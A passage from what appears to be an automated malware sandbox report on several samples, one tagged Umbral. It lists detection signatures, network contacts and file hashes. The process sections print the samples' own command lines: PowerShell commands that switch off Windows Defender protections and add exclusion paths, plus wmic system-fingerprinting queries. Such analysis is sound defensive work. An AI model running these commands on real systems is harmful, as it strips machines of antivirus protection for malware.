| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2544 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2544 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe
"C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2544-0-0x00007FF822563000-0x00007FF822565000-memory.dmp
memory/2544-1-0x000001EFDE530000-0x000001EFDE570000-memory.dmp
memory/2544-2-0x00007FF822560000-0x00007FF823021000-memory.dmp
memory/2544-4-0x000001EFE0270000-0x000001EFE0372000-memory.dmp
memory/2544-5-0x00007FF822560000-0x00007FF823021000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
103s
Max time network
140s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe
"C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/3036-1-0x0000013057850000-0x0000013057890000-memory.dmp
memory/3036-0-0x00007FFCAECC3000-0x00007FFCAECC5000-memory.dmp
memory/3036-2-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ui4gvzh.5iw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3520-13-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-5-0x00000268AC4E0000-0x00000268AC502000-memory.dmp
memory/3520-14-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-15-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-18-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-19-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a0407fd3b6a0e95729793e05880b558 |
| SHA1 | c704aff8e50b66cc5e7eaa51fe8fa41b0ef76ab6 |
| SHA256 | d641339de65c0d9ffd34a706fa9fcf408f2da61bdedf37fddad0ae9c8654e23e |
| SHA512 | a8cf10aa0ad92bb7a6dc4da5d8445bd2482864612071f525b3d0da92357dad56c1a690f8755e2dc138c044387871cdf8a3af6493af8bfbb2e34214eb809a0f72 |
memory/3036-33-0x0000013071FD0000-0x0000013072046000-memory.dmp
memory/3036-32-0x0000013071F80000-0x0000013071FD0000-memory.dmp
memory/3036-34-0x00000130596F0000-0x000001305970E000-memory.dmp
memory/3036-42-0x0000013059750000-0x0000013059762000-memory.dmp
memory/3036-41-0x0000013059720000-0x000001305972A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a58f982c18490e622e00d4eb75ace5a |
| SHA1 | 60c30527b74659ecf09089a5a7c02a1df9a71b65 |
| SHA256 | 4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d |
| SHA512 | ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480 |
memory/3036-58-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe
"C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
Files
memory/1052-0-0x000000007463E000-0x000000007463F000-memory.dmp
memory/1052-1-0x0000000000BE0000-0x0000000000F36000-memory.dmp
memory/1052-2-0x0000000074630000-0x0000000074D1E000-memory.dmp
memory/1052-4-0x0000000000320000-0x000000000032A000-memory.dmp
memory/1052-3-0x0000000000320000-0x000000000032A000-memory.dmp
memory/2724-7-0x000000006C691000-0x000000006C692000-memory.dmp
memory/2724-9-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-10-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-8-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-11-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-12-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/1052-13-0x0000000004CF0000-0x0000000004D30000-memory.dmp
memory/1052-14-0x0000000004CF0000-0x0000000004D30000-memory.dmp
memory/1052-15-0x000000007463E000-0x000000007463F000-memory.dmp
memory/1052-16-0x0000000074630000-0x0000000074D1E000-memory.dmp
memory/1052-17-0x0000000000320000-0x000000000032A000-memory.dmp
memory/1052-18-0x0000000000320000-0x000000000032A000-memory.dmp
memory/1052-19-0x0000000004CF0000-0x0000000004D30000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
103s
Max time network
142s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3928 wrote to memory of 5772 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3928 wrote to memory of 5772 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3928 wrote to memory of 5772 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe
"C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/3928-0-0x0000000074FAE000-0x0000000074FAF000-memory.dmp
memory/3928-1-0x00000000008A0000-0x0000000000BF6000-memory.dmp
memory/3928-2-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/3928-3-0x0000000005640000-0x000000000565C000-memory.dmp
memory/3928-4-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/3928-5-0x0000000005ED0000-0x0000000006474000-memory.dmp
memory/5772-7-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-8-0x0000000005870000-0x0000000005E98000-memory.dmp
memory/5772-6-0x0000000002E20000-0x0000000002E56000-memory.dmp
memory/5772-9-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-10-0x0000000074FA0000-0x0000000075750000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txhnjxin.nba.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5772-16-0x0000000005650000-0x0000000005672000-memory.dmp
memory/5772-21-0x0000000005EA0000-0x0000000005F06000-memory.dmp
memory/5772-22-0x0000000006060000-0x00000000060C6000-memory.dmp
memory/5772-23-0x00000000060D0000-0x0000000006424000-memory.dmp
memory/5772-24-0x0000000006020000-0x000000000603E000-memory.dmp
memory/5772-25-0x0000000006440000-0x000000000648C000-memory.dmp
memory/5772-26-0x00000000069D0000-0x0000000006A02000-memory.dmp
memory/5772-37-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-38-0x0000000006980000-0x000000000699E000-memory.dmp
memory/5772-27-0x000000006D230000-0x000000006D27C000-memory.dmp
memory/5772-39-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-40-0x00000000075D0000-0x0000000007673000-memory.dmp
memory/5772-42-0x0000000007730000-0x000000000774A000-memory.dmp
memory/5772-41-0x0000000007D70000-0x00000000083EA000-memory.dmp
memory/5772-43-0x00000000077A0000-0x00000000077AA000-memory.dmp
memory/5772-44-0x00000000079B0000-0x0000000007A46000-memory.dmp
memory/5772-45-0x0000000007930000-0x0000000007941000-memory.dmp
memory/5772-46-0x0000000007980000-0x000000000798E000-memory.dmp
memory/5772-47-0x0000000007990000-0x00000000079A4000-memory.dmp
memory/5772-48-0x0000000007A90000-0x0000000007AAA000-memory.dmp
memory/5772-49-0x0000000007A70000-0x0000000007A78000-memory.dmp
memory/5772-52-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/3928-53-0x0000000074FAE000-0x0000000074FAF000-memory.dmp
memory/3928-54-0x00000000075C0000-0x00000000075C8000-memory.dmp
memory/3928-55-0x000000000A9B0000-0x000000000A9E8000-memory.dmp
memory/3928-56-0x00000000075F0000-0x00000000075FE000-memory.dmp
memory/3928-57-0x0000000074FA0000-0x0000000075750000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2025-03-22 06:17
